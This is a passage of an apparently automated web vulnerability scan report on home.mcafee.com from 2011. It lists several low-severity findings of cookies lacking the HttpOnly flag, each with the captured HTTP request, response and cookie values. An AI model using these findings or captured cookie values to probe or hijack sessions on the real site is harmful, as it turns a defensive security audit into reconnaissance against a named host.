Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/VirusInfo/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:59 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fVirusInfo%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:58 GMT
Content-Length: 72983
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

14.45. http://home.mcafee.com/root/MyAccount.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /root/MyAccount.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/MyAccount.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://home.mcafee.com/Secure/Protected/Login.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/root/MyAccount.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2froot%2fMyAccount.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV8
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:56 GMT
Content-Length: 809
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://home.mcafee.com/Secure/Protected/Login.aspx">here</a>.</h2>
<!-- Start Home.mcafee code version --> <script
...[SNIP]...

14.46. http://home.mcafee.com/root/dynamicpage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /root/dynamicpage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /root/dynamicpage.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://home.mcafee.com/Default.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/root/dynamicpage.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2froot%2fdynamicpage.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV3
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 847
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://home.mcafee.com/Default.aspx">here</a>.</h2>
<!-- Start Home.mcafee code version --> <script language="JavaSc
...[SNIP]...

14.47. http://home.mcafee.com/store/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /store/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Location: http://home.mcafee.com/Store/Store9.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/store/default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:58 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fstore%2fdefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:57 GMT
Content-Length: 0
Connection: close


14.48. http://home.mcafee.com/supportpages/privacyFeedback.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /supportpages/privacyFeedback.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supportpages/privacyFeedback.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/supportpages/privacyFeedback.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: pfb=; domain=mcafee.com; expires=Fri, 29-Apr-2011 22:19:04 GMT; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:04 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsupportpages%2fprivacyFeedback.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV7
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:04 GMT
Content-Length: 18523
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"
...[SNIP]...

14.49. http://home.mcafee.com/supportpages/purchasehelp.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /supportpages/purchasehelp.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supportpages/purchasehelp.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV3
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:03 GMT
Content-Length: 6066
Connection: close


